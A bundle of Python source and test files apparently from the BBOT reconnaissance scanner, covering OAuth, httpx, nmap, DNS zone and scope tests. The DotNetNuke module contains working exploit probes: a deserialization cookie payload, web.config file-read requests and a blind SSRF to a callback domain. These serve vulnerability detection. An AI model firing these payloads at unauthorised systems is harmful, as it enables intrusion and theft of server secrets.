from .base import ModuleTestBase

from .test_module_azure_realm import TestAzure_Realm as Azure_Realm


class TestOAUTH(ModuleTestBase):
    targets = ["evilcorp.com"]
    config_overrides = {"scope_report_distance": 1, "omit_event_types": []}
    modules_overrides = ["azure_realm", "oauth"]
    openid_config_azure = {
        "token_endpoint": "https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/oauth2/token",
        "token_endpoint_auth_methods_supported": ["client_secret_post", "private_key_jwt", "client_secret_basic"],
        "jwks_uri": "https://login.windows.net/common/discovery/keys",
        "response_modes_supported": ["query", "fragment", "form_post"],
        "subject_types_supported": ["pairwise"],
        "id_token_signing_alg_values_supported": ["RS256"],
        "response_types_supported": ["code", "id_token", "code id_token", "token id_token", "token"],
        "scopes_supported": ["openid"],
        "issuer": "https://sts.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/",
        "microsoft_multi_refresh_token": True,
        "authorization_endpoint": "https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/oauth2/authorize",
        "device_authorization_endpoint": "https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/oauth2/devicecode",
        "http_logout_supported": True,
        "frontchannel_logout_supported": True,
        "end_session_endpoint": "https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/oauth2/logout",
        "claims_supported": [
            "sub",
            "iss",
            "cloud_instance_name",
            "cloud_instance_host_name",
            "cloud_graph_host_name",
            "msgraph_host",
            "aud",
            "exp",
            "iat",
            "auth_time",
            "acr",
            "amr",
            "nonce",
            "email",
            "given_name",
            "family_name",
            "nickname",
        ],
        "check_session_iframe": "https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/oauth2/checksession",
        "userinfo_endpoint": "https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/openid/userinfo",
        "kerberos_endpoint": "https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/kerberos",
        "tenant_region_scope": "NA",
        "cloud_instance_name": "microsoftonline.com",
        "cloud_graph_host_name": "graph.windows.net",
        "msgraph_host": "graph.microsoft.com",
        "rbac_url": "https://pas.windows.net",
    }
    openid_config_okta = {
        "issuer": "https://evilcorp.okta.com",
        "authorization_endpoint": "https://evilcorp.okta.com/oauth2/v1/authorize",
        "token_endpoint": "https://evilcorp.okta.com/oauth2/v1/token",
        "userinfo_endpoint": "https://evilcorp.okta.com/oauth2/v1/userinfo",
        "registration_endpoint": "https://evilcorp.okta.com/oauth2/v1/clients",
        "jwks_uri": "https://evilcorp.okta.com/oauth2/v1/keys",
        "response_types_supported": [
            "code",
            "id_token",
            "code id_token",
            "code token",
            "id_token token",
            "code id_token token",
        ],
        "response_modes_supported": ["query", "fragment", "form_post", "okta_post_message"],
        "grant_types_supported": [
            "authorization_code",
            "implicit",
            "refresh_token",
            "password",
            "urn:ietf:params:oauth:grant-type:device_code",
            "urn:openid:params:grant-type:ciba",
        ],
        "subject_types_supported": ["public"],
        "id_token_signing_alg_values_supported": ["RS256"],
        "scopes_supported": ["openid", "email", "profile", "address", "phone", "offline_access", "groups"],
        "token_endpoint_auth_methods_supported": [
            "client_secret_basic",
            "client_secret_post",
            "client_secret_jwt",
            "private_key_jwt",
            "none",
        ],
        "claims_supported": [
            "iss",
            "ver",
            "sub",
            "aud",
            "iat",
            "exp",
            "jti",
            "auth_time",
            "amr",
            "idp",
            "nonce",
            "name",
            "nickname",
            "preferred_username",
            "given_name",
            "middle_name",
            "family_name",
            "email",
            "email_verified",
            "profile",
            "zoneinfo",
            "locale",
            "address",
            "phone_number",
            "picture",
            "website",
            "gender",
            "birthdate",
            "updated_at",
            "at_hash",
            "c_hash",
        ],
        "code_challenge_methods_supported": ["S256"],
        "introspection_endpoint": "https://evilcorp.okta.com/oauth2/v1/introspect",
        "introspection_endpoint_auth_methods_supported": [
            "client_secret_basic",
            "client_secret_post",
            "client_secret_jwt",
            "private_key_jwt",
            "none",
        ],
        "revocation_endpoint": "https://evilcorp.okta.com/oauth2/v1/revoke",
        "revocation_endpoint_auth_methods_supported": [
            "client_secret_basic",
            "client_secret_post",
            "client_secret_jwt",
            "private_key_jwt",
            "none",
        ],
        "end_session_endpoint": "https://evilcorp.okta.com/oauth2/v1/logout",
        "request_parameter_supported": True,
        "request_object_signing_alg_values_supported": [
            "HS256",
            "HS384",
            "HS512",
            "RS256",
            "RS384",
            "RS512",
            "ES256",
            "ES384",
            "ES512",
        ],
        "device_authorization_endpoint": "https://evilcorp.okta.com/oauth2/v1/device/authorize",
        "pushed_authorization_request_endpoint": "https://evilcorp.okta.com/oauth2/v1/par",
        "backchannel_token_delivery_modes_supported": ["poll"],
        "backchannel_authentication_request_signing_alg_values_supported": [
            "HS256",
            "HS384",
            "HS512",
            "RS256",
            "RS384",
            "RS512",
            "ES256",
            "ES384",
            "ES512",
        ],
    }

    async def setup_after_prep(self, module_test):
        module_test.httpx_mock.add_response(
            url=f"https://login.microsoftonline.com/getuserrealm.srf?login=test@evilcorp.com",
            json=Azure_Realm.response_json,
        )
        module_test.httpx_mock.add_response(
            url="https://login.windows.net/evilcorp.com/.well-known/openid-configuration",
            json=self.openid_config_azure,
        )
        module_test.httpx_mock.add_response(
            url="https://evilcorp.okta.com/.well-known/openid-configuration",
            json=self.openid_config_okta,
        )
        module_test.httpx_mock.add_response(
            url="https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/oauth2/token",
            json={
                "error": "invalid_grant",
                "error_description": "AADSTS9002313: Invalid request. Request is malformed or invalid.\r\nTrace ID: a3618b0d-d3b2-4669-96bc-ce414e202300\r\nCorrelation ID: fc54afc5-6f9d-4488-90ba-d8213515b847\r\nTimestamp: 2023-07-12 20:39:45Z",
                "error_codes": [9002313],
                "timestamp": "2023-07-12 20:39:45Z",
                "trace_id": "a3618b0d-d3b2-4669-96bc-ce414e202300",
                "correlation_id": "fc54afc5-6f9d-4488-90ba-d8213515b847",
                "error_uri": "https://login.windows.net/error?code=9002313",
            },
            status_code=400,
        )
        module_test.httpx_mock.add_response(
            url="https://evilcorp.okta.com/oauth2/v1/token",
            json={
                "errorCode": "invalid_client",
                "errorSummary": "Invalid value for 'client_id' parameter.",
                "errorLink": "invalid_client",
                "errorId": "oae06YVQDq4Qz-WEuP3dU14XQ",
                "errorCauses": [],
            },
            status_code=400,
        )

    def check(self, module_test, events):
        assert any(
            e.type == "FINDING"
            and e.data["description"]
            == "OpenID Connect Endpoint (domain: evilcorp.com) found at https://login.windows.net/evilcorp.com/.well-known/openid-configuration"
            for e in events
        )
        assert any(
            e.type == "FINDING"
            and e.data["description"]
            == "OpenID Connect Endpoint (domain: evilcorp.com) found at https://evilcorp.okta.com/.well-known/openid-configuration"
            for e in events
        )
        assert any(
            e.type == "FINDING"
            and e.data["description"]
            == "Potentially Sprayable OAUTH Endpoint (domain: evilcorp.com) at https://login.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/oauth2/token"
            for e in events
        )
        assert any(
            e.type == "FINDING"
            and e.data["description"]
            == "Potentially Sprayable OAUTH Endpoint (domain: evilcorp.com) at https://evilcorp.okta.com/oauth2/v1/token"
            for e in events
        )
        assert any(e.data == "https://sts.windows.net/cc74fc12-4142-400e-a653-f98bdeadbeef/" for e in events)



from .base import ModuleTestBase


class TestHTTPX(ModuleTestBase):
    targets = ["http://127.0.0.1:8888/url", "127.0.0.1:8888"]
    config_overrides = {"modules": {"httpx": {"store_responses": True}}}

    # HTML for a page with a login form
    html_with_login = """
<html>
<body>
    <form>
        <input type="text" name="username">
        <input name="password">
        <input type="submit" value="Login">
    </form>
</body>
</html>"""

    # HTML for a page without a login form
    html_without_login = """
<html>
<body>
    <form>
        <input type="text" name="search">
        <input type="submit" value="Search">
    </form>
</body>
</html>"""

    async def setup_after_prep(self, module_test):
        request_args = dict(uri="/", headers={"test": "header"})
        respond_args = dict(response_data=self.html_without_login)
        module_test.set_expect_requests(request_args, respond_args)
        request_args = dict(uri="/url", headers={"test": "header"})
        respond_args = dict(response_data=self.html_with_login)
        module_test.set_expect_requests(request_args, respond_args)

    def check(self, module_test, events):
        url = False
        open_port = False
        for e in events:
            if e.type == "HTTP_RESPONSE":
                if e.data["path"] == "/":
                    assert not "login-page" in e.tags
                    open_port = True
                elif e.data["path"] == "/url":
                    assert "login-page" in e.tags
                    url = True
        assert url, "Failed to visit target URL"
        assert open_port, "Failed to visit target OPEN_TCP_PORT"
        saved_response = module_test.scan.home / "httpx" / "127.0.0.1.8888[slash]url.txt"
        assert saved_response.is_file(), "Failed to save raw httpx response"


class TestHTTPX_404(ModuleTestBase):
    targets = ["https://127.0.0.1:9999"]
    modules_overrides = ["httpx", "speculate", "excavate"]
    config_overrides = {"internal_modules": {"speculate": {"ports": "8888,9999"}}}

    async def setup_after_prep(self, module_test):
        module_test.httpserver.expect_request("/").respond_with_data(
            "Redirecting...", status=301, headers={"Location": "https://127.0.0.1:9999"}
        )
        module_test.httpserver_ssl.expect_request("/").respond_with_data("404 not found", status=404)

    def check(self, module_test, events):
        assert 1 == len(
            [e for e in events if e.type == "URL" and e.data == "http://127.0.0.1:8888/" and "status-301" in e.tags]
        )
        assert 1 == len([e for e in events if e.type == "URL" and e.data == "https://127.0.0.1:9999/"])


class TestHTTPX_Redirect(ModuleTestBase):
    targets = ["http://127.0.0.1:8888"]
    modules_overrides = ["httpx", "speculate", "excavate"]

    async def setup_after_prep(self, module_test):
        module_test.httpserver.expect_request("/").respond_with_data(
            "Redirecting...", status=301, headers={"Location": "http://www.evilcorp.com"}
        )

    def check(self, module_test, events):
        assert 1 == len(
            [e for e in events if e.type == "URL" and e.data == "http://127.0.0.1:8888/" and "status-301" in e.tags]
        )
        assert 1 == len(
            [
                e
                for e in events
                if e.type == "URL_UNVERIFIED" and e.data == "http://www.evilcorp.com/" and "affiliate" in e.tags
            ]
        )
        assert 1 == len(
            [
                e
                for e in events
                if e.type.startswith("DNS_NAME") and e.data == "www.evilcorp.com" and "affiliate" in e.tags
            ]
        )


class TestHTTPX_URLBlacklist(ModuleTestBase):
    targets = ["http://127.0.0.1:8888"]
    modules_overrides = ["httpx", "speculate", "excavate"]
    config_overrides = {"web_spider_distance": 10, "web_spider_depth": 10}

    async def setup_after_prep(self, module_test):
        module_test.httpserver.expect_request("/").respond_with_data(
            """
            <a href="/test.aspx"/>
            <a href="/test.svg"/>
            <a href="/test.woff2"/>
            <a href="/test.txt"/>
            """
        )

    def check(self, module_test, events):
        assert 4 == len([e for e in events if e.type == "URL_UNVERIFIED"])
        assert 3 == len([e for e in events if e.type == "HTTP_RESPONSE"])
        assert 3 == len([e for e in events if e.type == "URL"])
        assert 1 == len([e for e in events if e.type == "URL" and e.data == "http://127.0.0.1:8888/"])
        assert 1 == len([e for e in events if e.type == "URL" and e.data == "http://127.0.0.1:8888/test.aspx"])
        assert 1 == len([e for e in events if e.type == "URL" and e.data == "http://127.0.0.1:8888/test.txt"])
        assert not any([e for e in events if "URL" in e.type and ".svg" in e.data])
        assert not any([e for e in events if "URL" in e.type and ".woff" in e.data])



from bbot.modules.base import BaseModule
from bbot.core.errors import InteractshError


class dotnetnuke(BaseModule):
    DNN_signatures_body = [
        "<!-- by DotNetNuke Corporation",
        "<!-- DNN Platform",
        "/js/dnncore.js",
        'content=",DotNetNuke,DNN',
        "dnn_ContentPane",
        'class="DnnModule"',
        "/Install/InstallWizard.aspx",
    ]
    DNN_signatures_header = ["DNNOutputCache", "X-Compressed-By: DotNetNuke"]
    exploit_probe = {
        "DNNPersonalization": r'<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\Windows\win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>'
    }

    watched_events = ["HTTP_RESPONSE"]
    produced_events = ["VULNERABILITY", "TECHNOLOGY"]
    flags = ["active", "aggressive", "web-thorough"]
    meta = {"description": "Scan for critical DotNetNuke (DNN) vulnerabilities"}

    async def setup(self):
        self.event_dict = {}
        self.interactsh_subdomain_tags = {}
        self.interactsh_instance = None

        if self.scan.config.get("interactsh_disable", False) == False:

            try:
                self.interactsh_instance = self.helpers.interactsh()
                self.interactsh_domain = await self.interactsh_instance.register(callback=self.interactsh_callback)
            except InteractshError as e:
                self.warning(f"Interactsh failure: {e}")

        return True

    async def interactsh_callback(self, r):
        full_id = r.get("full-id", None)
        if full_id:
            if "." in full_id:
                event = self.interactsh_subdomain_tags.get(full_id.split(".")[0])
                if not event:
                    return
                await self.emit_event(
                    {
                        "severity": "MEDIUM",
                        "host": str(event.host),
                        "url": event.data["url"],
                        "description": f"DotNetNuke Blind-SSRF (CVE 2017-0929)",
                    },
                    "VULNERABILITY",
                    event,
                )
            else:
                # this is likely caused by something trying to resolve the base domain first and can be ignored
                self.debug("skipping result because subdomain tag was missing")

    async def handle_event(self, event):
        detected = False
        raw_headers = event.data.get("raw_header", None)

        if raw_headers:
            for header_signature in self.DNN_signatures_header:
                if header_signature in raw_headers:
                    await self.emit_event(
                        {"technology": "DotNetNuke", "url": event.data["url"], "host": str(event.host)},
                        "TECHNOLOGY",
                        event,
                    )
                    detected = True
                    break
        resp_body = event.data.get("body", None)
        if resp_body:
            for body_signature in self.DNN_signatures_body:
                if body_signature in resp_body:
                    await self.emit_event(
                        {"technology": "DotNetNuke", "url": event.data["url"], "host": str(event.host)},
                        "TECHNOLOGY",
                        event,
                    )
                    detected = True
                    break

        if detected == True:
            # DNNPersonalization Deserialization Detection
            for probe_url in [f'{event.data["url"]}/__', f'{event.data["url"]}/', f'{event.data["url"]}']:
                result = await self.helpers.request(probe_url, cookies=self.exploit_probe)
                if result:
                    if "for 16-bit app support" in result.text and "[extensions]" in result.text:
                        await self.emit_event(
                            {
                                "severity": "CRITICAL",
                                "description": "DotNetNuke Personalization Cookie Deserialization",
                                "host": str(event.host),
                                "url": probe_url,
                            },
                            "VULNERABILITY",
                            event,
                        )

            if "endpoint" not in event.tags:

                # NewsArticlesSlider ImageHandler.ashx File Read
                result = await self.helpers.request(
                    f'{event.data["url"]}/DesktopModules/dnnUI_NewsArticlesSlider/ImageHandler.ashx?img=~/web.config'
                )
                if result:
                    if "<configuration>" in result.text:
                        await self.emit_event(
                            {
                                "severity": "CRITICAL",
                                "description": "DotNetNuke dnnUI_NewsArticlesSlider Module Arbitrary File Read",
                                "host": str(event.host),
                                "url": f'{event.data["url"]}/DesktopModules/dnnUI_NewsArticlesSlider/ImageHandler.ashx',
                            },
                            "VULNERABILITY",
                            event,
                        )

                # DNNArticle GetCSS.ashx File Read
                result = await self.helpers.request(
                    f'{event.data["url"]}/DesktopModules/DNNArticle/getcss.ashx?CP=%2fweb.config&smid=512&portalid=3'
                )
                if result:
                    if "<configuration>" in result.text:
                        await self.emit_event(
                            {
                                "severity": "CRITICAL",
                                "description": "DotNetNuke DNNArticle Module GetCSS.ashx Arbitrary File Read",
                                "host": str(event.host),
                                "url": f'{event.data["url"]}/Desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config',
                            },
                            "VULNERABILITY",
                            event,
                        )

                # InstallWizard SuperUser Privilege Escalation
                result = await self.helpers.request(f'{event.data["url"]}/Install/InstallWizard.aspx')
                if result.status_code == 200:
                    result_confirm = await self.helpers.request(
                        f'{event.data["url"]}/Install/InstallWizard.aspx?__viewstate=1'
                    )
                    if result_confirm.status_code == 500:
                        await self.emit_event(
                            {
                                "severity": "CRITICAL",
                                "description": "DotNetNuke InstallWizard SuperUser Privilege Escalation",
                                "host": str(event.host),
                                "url": f'{event.data["url"]}/Install/InstallWizard.aspx',
                            },
                            "VULNERABILITY",
                            event,
                        )
                        return

                # DNNImageHandler.ashx Blind SSRF
                self.event_dict[event.data["url"]] = event
                if self.interactsh_instance:
                    subdomain_tag = self.helpers.rand_string(4, digits=False)
                    self.interactsh_subdomain_tags[subdomain_tag] = event

                    await self.helpers.request(
                        f'{event.data["url"]}/DnnImageHandler.ashx?mode=file&url=http://{subdomain_tag}.{self.interactsh_domain}'
                    )
                else:
                    self.debug(
                        "Aborting DNNImageHandler SSRF check due to interactsh global disable or interactsh setup failure"
                    )
                    return None

    async def cleanup(self):
        if self.interactsh_instance:
            try:
                await self.interactsh_instance.deregister()
                self.debug(
                    f"successfully deregistered interactsh session with correlation_id {self.interactsh_instance.correlation_id}"
                )
            except InteractshError as e:
                self.warning(f"Interactsh failure: {e}")

    async def finish(self):
        if self.interactsh_instance:
            await self.helpers.sleep(5)
            try:
                for r in await self.interactsh_instance.poll():
                    await self.interactsh_callback(r)
            except InteractshError as e:
                self.debug(f"Error in interact.sh: {e}")



from .base import ModuleTestBase


class TestNmap(ModuleTestBase):
    targets = ["127.0.0.1/31"]
    config_overrides = {"modules": {"nmap": {"ports": "8888,8889"}}}

    async def setup_after_prep(self, module_test):
        # make sure our IP_RANGE / IP_ADDRESS filtering is working right
        # IPs within the target IP range should be rejected
        ip_event_1 = module_test.scan.make_event("127.0.0.0", source=module_test.scan.root_event)
        ip_event_1.scope_distance = 0
        ip_event_1_result = await module_test.module._event_postcheck(ip_event_1)
        assert ip_event_1_result[0] == False
        assert (
            "it did not meet custom filter criteria: skipping 127.0.0.0 because it is already included in 127.0.0.0/31"
            in ip_event_1_result[1]
        )
        # but ones outside should be accepted
        ip_event_2 = module_test.scan.make_event("127.0.0.3", source=module_test.scan.root_event)
        ip_event_2.scope_distance = 0
        assert (await module_test.module._event_postcheck(ip_event_2))[0] == True

    def check(self, module_test, events):
        assert 1 == len([e for e in events if e.data == "127.0.0.1:8888"])
        assert not any(e.data == "127.0.0.1:8889" for e in events)


class TestNmapAssetInventory(ModuleTestBase):
    targets = ["127.0.0.1/31"]
    config_overrides = {
        "modules": {"nmap": {"ports": "8888,8889"}},
        "output_modules": {"asset_inventory": {"use_previous": True}},
    }
    modules_overrides = ["nmap", "asset_inventory"]
    module_name = "nmap"
    scan_name = "nmap_test_asset_inventory"

    async def setup_after_prep(self, module_test):
        from bbot.scanner import Scanner

        first_scan_config = module_test.scan.config.copy()
        first_scan_config["output_modules"]["asset_inventory"]["use_previous"] = False
        first_scan = Scanner("127.0.0.1", name=self.scan_name, modules=["asset_inventory"], config=first_scan_config)
        await first_scan.async_start_without_generator()

        asset_inventory_output_file = first_scan.home / "asset-inventory.csv"
        assert "127.0.0.1," in open(asset_inventory_output_file).read()
        # make sure our IP_RANGE / IP_ADDRESS filtering is working right
        # IPs within the target IP range should not be rejected because asset_inventory.use_previous=true
        ip_event_1 = module_test.scan.make_event("127.0.0.0", source=module_test.scan.root_event)
        ip_event_1.scope_distance = 0
        assert (await module_test.module._event_postcheck(ip_event_1))[0] == True
        # but ones outside should be accepted
        ip_event_2 = module_test.scan.make_event("127.0.0.3", source=module_test.scan.root_event)
        ip_event_2.scope_distance = 0
        assert (await module_test.module._event_postcheck(ip_event_2))[0] == True

        ip_range_event = module_test.scan.make_event("127.0.0.1/31", source=module_test.scan.root_event)
        ip_range_event.scope_distance = 0
        ip_range_filter_result = await module_test.module._event_postcheck(ip_range_event)
        assert ip_range_filter_result[0] == False
        assert f"skipping IP_RANGE 127.0.0.0/31 because asset_inventory.use_previous=True" in ip_range_filter_result[1]

    def check(self, module_test, events):
        assert 1 == len(
            [
                e
                for e in events
                if e.data == "127.0.0.1:8888"
                and e.source.data == "127.0.0.1"
                and str(e.source.module) == "asset_inventory"
            ]
        )
        assert not any(e.data == "127.0.0.1:8889" for e in events)



from .base import ModuleTestBase


class TestNeo4j(ModuleTestBase):
    async def setup_before_prep(self, module_test):
        # install neo4j
        deps_pip = module_test.preloaded["neo4j"]["deps"]["pip"]
        await module_test.scan.helpers.depsinstaller.pip_install(deps_pip)

        self.neo4j_used = False

        class MockResult:
            async def single(s):
                self.neo4j_used = True
                return {"id(_)": 1}

        class MockSession:
            async def run(s, *args, **kwargs):
                return MockResult()

            async def close(self):
                pass

        class MockDriver:
            def __init__(self, *args, **kwargs):
                pass

            def session(self, *args, **kwargs):
                return MockSession()

            async def close(self):
                pass

        module_test.monkeypatch.setattr("neo4j.AsyncGraphDatabase.driver", MockDriver)

    def check(self, module_test, events):
        assert self.neo4j_used == True



from bbot.modules.base import BaseModule
from bbot.modules.output.human import Human


class Emails(Human):
    watched_events = ["EMAIL_ADDRESS"]
    flags = ["email-enum"]
    meta = {"description": "Output any email addresses found belonging to the target domain"}
    options = {"output_file": ""}
    options_desc = {"output_file": "Output to file"}
    in_scope_only = True

    output_filename = "emails.txt"

    async def setup(self):
        self.emails_written = 0
        return await super().setup()

    def _scope_distance_check(self, event):
        return BaseModule._scope_distance_check(self, event)

    async def handle_event(self, event):
        if self.file is not None:
            self.emails_written += 1
            self.file.write(f"{event.data}\n")
            self.file.flush()

    async def report(self):
        if getattr(self, "_file", None) is not None:
            self.info(f"Saved {self.emails_written:,} email addresses to {self.output_file}")



from ..bbot_fixtures import *  # noqa: F401


@pytest.mark.asyncio
async def test_target(bbot_config, bbot_scanner):
    scan1 = bbot_scanner("api.publicapis.org", "8.8.8.8/30", "2001:4860:4860::8888/126", config=bbot_config)
    scan2 = bbot_scanner("8.8.8.8/29", "publicapis.org", "2001:4860:4860::8888/125", config=bbot_config)
    scan3 = bbot_scanner("8.8.8.8/29", "publicapis.org", "2001:4860:4860::8888/125", config=bbot_config)
    scan4 = bbot_scanner("8.8.8.8/29", config=bbot_config)
    scan5 = bbot_scanner(config=bbot_config)
    assert not scan5.target
    assert len(scan1.target) == 9
    assert len(scan4.target) == 8
    assert "8.8.8.9" in scan1.target
    assert "8.8.8.12" not in scan1.target
    assert "8.8.8.8/31" in scan1.target
    assert "8.8.8.8/30" in scan1.target
    assert "8.8.8.8/29" not in scan1.target
    assert "2001:4860:4860::8889" in scan1.target
    assert "2001:4860:4860::888c" not in scan1.target
    assert "www.api.publicapis.org" in scan1.target
    assert "api.publicapis.org" in scan1.target
    assert "publicapis.org" not in scan1.target
    assert "bob@www.api.publicapis.org" in scan1.target
    assert "https://www.api.publicapis.org" in scan1.target
    assert "www.api.publicapis.org:80" in scan1.target
    assert scan1.make_event("https://[2001:4860:4860::8888]:80", dummy=True) in scan1.target
    assert scan1.make_event("[2001:4860:4860::8888]:80", "OPEN_TCP_PORT", dummy=True) in scan1.target
    assert scan1.make_event("[2001:4860:4860::888c]:80", "OPEN_TCP_PORT", dummy=True) not in scan1.target
    assert scan1.target in scan2.target
    assert scan2.target not in scan1.target
    assert scan3.target in scan2.target
    assert scan2.target == scan3.target
    assert scan4.target != scan1.target

    assert str(scan1.target.get("8.8.8.9").host) == "8.8.8.8/30"
    assert scan1.target.get("8.8.8.12") is None
    assert str(scan1.target.get("2001:4860:4860::8889").host) == "2001:4860:4860::8888/126"
    assert scan1.target.get("2001:4860:4860::888c") is None
    assert str(scan1.target.get("www.api.publicapis.org").host) == "api.publicapis.org"
    assert scan1.target.get("publicapis.org") is None



import ipaddress

from bbot.modules.base import BaseModule


class portscanner(BaseModule):
    """
    A portscanner containing useful methods for nmap, masscan, etc.
    """

    async def setup(self):
        self.ip_ranges = [e.host for e in self.scan.target.events if e.type == "IP_RANGE"]
        exclude, invalid_exclude = self._build_targets(self.scan.blacklist)
        if not exclude:
            exclude = ["255.255.255.255/32"]
        self.exclude_file = self.helpers.tempfile(exclude, pipe=False)
        if invalid_exclude > 0:
            self.warning(
                f"Port scanner can only accept IP addresses or IP ranges as blacklist ({invalid_exclude:,} blacklisted were hostnames)"
            )
        return True

    async def filter_event(self, event):
        """
        The purpose of this filter_event is to decide whether we should accept individual IP_ADDRESS
        events that reside inside our target subnets (IP_RANGE), if any.

        This prevents scanning the same IP twice.
        """
        # if we are emitting hosts from a previous asset_inventory, this is a special case
        # in this case we want to accept the individual IPs even if they overlap with our target ranges
        asset_inventory_module = self.scan.modules.get("asset_inventory", None)
        asset_inventory_config = getattr(asset_inventory_module, "config", {})
        asset_inventory_use_previous = asset_inventory_config.get("use_previous", False)
        if event.type == "IP_ADDRESS" and not asset_inventory_use_previous:
            for net in self.helpers.ip_network_parents(event.data, include_self=True):
                if net in self.ip_ranges:
                    return False, f"skipping {event.host} because it is already included in {net}"
        elif event.type == "IP_RANGE" and asset_inventory_use_previous:
            return False, f"skipping IP_RANGE {event.host} because asset_inventory.use_previous=True"
        return True

    def _build_targets(self, target):
        invalid_targets = 0
        targets = []
        for t in target:
            t = self.helpers.make_ip_type(t.data)
            if isinstance(t, str):
                invalid_targets += 1
            else:
                if self.helpers.is_ip(t):
                    targets.append(str(ipaddress.ip_network(t)))
                else:
                    targets.append(str(t))
        return targets, invalid_targets



import dns
from .base import ModuleTestBase


class BaseTestBaddns_zone(ModuleTestBase):
    modules_overrides = ["baddns_zone"]
    targets = ["bad.dns"]
    config_overrides = {"dns_resolution": True}

    async def dispatchWHOIS(x):
        return None


class TestBaddns_zone_zonetransfer(BaseTestBaddns_zone):
    async def setup_after_prep(self, module_test):
        from baddns.lib.whoismanager import WhoisManager

        def from_xfr(*args, **kwargs):
            zone_text = """
@ 600 IN SOA ns.bad.dns. admin.bad.dns. (
    1   ; Serial
    3600   ; Refresh
    900   ; Retry
    604800   ; Expire
    86400 )  ; Minimum TTL
@ 600 IN NS ns.bad.dns.
@ 600 IN A 127.0.0.1
asdf 600 IN A 127.0.0.1
zzzz 600 IN AAAA dead::beef
"""
            zone = dns.zone.from_text(zone_text, origin="bad.dns.")
            return zone

        module_test.mock_dns({"bad.dns": {"NS": ["ns1.bad.dns."]}, "ns1.bad.dns": {"A": ["127.0.0.1"]}})
        module_test.monkeypatch.setattr("dns.zone.from_xfr", from_xfr)
        module_test.monkeypatch.setattr(WhoisManager, "dispatchWHOIS", self.dispatchWHOIS)

    def check(self, module_test, events):
        assert any(e.data == "zzzz.bad.dns" for e in events), "Zone transfer failed (1)"
        assert any(e.data == "asdf.bad.dns" for e in events), "Zone transfer failed (2)"
        assert any(e.type == "VULNERABILITY" for e in events), "Failed to emit VULNERABILITY"
        assert any("baddns-zonetransfer" in e.tags for e in events), "Failed to add baddns tag"


class TestBaddns_zone_nsec(BaseTestBaddns_zone):
    async def setup_after_prep(self, module_test):
        from baddns.lib.whoismanager import WhoisManager

        module_test.mock_dns(
            {
                "bad.dns": {"NSEC": ["asdf.bad.dns"]},
                "asdf.bad.dns": {"NSEC": ["zzzz.bad.dns"]},
                "zzzz.bad.dns": {"NSEC": ["xyz.bad.dns"]},
            }
        )
        module_test.monkeypatch.setattr(WhoisManager, "dispatchWHOIS", self.dispatchWHOIS)

    def check(self, module_test, events):
        assert any(e.data == "zzzz.bad.dns" for e in events), "NSEC Walk Failed (1)"
        assert any(e.data == "xyz.bad.dns" for e in events), "NSEC Walk Failed (2)"
        assert any(e.type == "VULNERABILITY" for e in events), "Failed to emit VULNERABILITY"
        assert any("baddns-nsec" in e.tags for e in events), "Failed to add baddns tag"



from ..bbot_fixtures import *


@pytest.mark.asyncio
async def test_scan(
    events,
    bbot_config,
    helpers,
    monkeypatch,
    bbot_scanner,
    mock_dns,
):
    scan0 = bbot_scanner(
        "1.1.1.1/31",
        "evilcorp.com",
        blacklist=["1.1.1.1/28", "www.evilcorp.com"],
        modules=["ipneighbor"],
        config=bbot_config,
    )
    await scan0.load_modules()
    assert scan0.whitelisted("1.1.1.1")
    assert scan0.whitelisted("1.1.1.0")
    assert scan0.blacklisted("1.1.1.15")
    assert not scan0.blacklisted("1.1.1.16")
    assert scan0.blacklisted("1.1.1.1/30")
    assert not scan0.blacklisted("1.1.1.1/27")
    assert not scan0.in_scope("1.1.1.1")
    assert scan0.whitelisted("api.evilcorp.com")
    assert scan0.whitelisted("www.evilcorp.com")
    assert not scan0.blacklisted("api.evilcorp.com")
    assert scan0.blacklisted("asdf.www.evilcorp.com")
    assert scan0.in_scope("test.api.evilcorp.com")
    assert not scan0.in_scope("test.www.evilcorp.com")
    assert not scan0.in_scope("www.evilcorp.co.uk")
    j = scan0.json
    assert "1.1.1.0/31" in j["targets"]
    assert "1.1.1.0/31" in j["whitelist"]
    assert "1.1.1.0/28" in j["blacklist"]
    assert "ipneighbor" in j["modules"]

    scan1 = bbot_scanner("1.1.1.1", whitelist=["1.0.0.1"], config=bbot_config)
    assert not scan1.blacklisted("1.1.1.1")
    assert not scan1.blacklisted("1.0.0.1")
    assert not scan1.whitelisted("1.1.1.1")
    assert scan1.whitelisted("1.0.0.1")
    assert scan1.in_scope("1.0.0.1")
    assert not scan1.in_scope("1.1.1.1")

    scan2 = bbot_scanner("1.1.1.1", config=bbot_config)
    assert not scan2.blacklisted("1.1.1.1")
    assert not scan2.blacklisted("1.0.0.1")
    assert scan2.whitelisted("1.1.1.1")
    assert not scan2.whitelisted("1.0.0.1")
    assert scan2.in_scope("1.1.1.1")
    assert not scan2.in_scope("1.0.0.1")

    dns_table = {
        "1.1.1.1.in-addr.arpa": {"PTR": ["one.one.one.one"]},
        "one.one.one.one": {"A": ["1.1.1.1"]},
    }

    # make sure DNS resolution works
    dns_config = OmegaConf.create({"dns_resolution": True})
    dns_config = OmegaConf.merge(bbot_config, dns_config)
    scan4 = bbot_scanner("1.1.1.1", config=dns_config)
    mock_dns(scan4, dns_table)
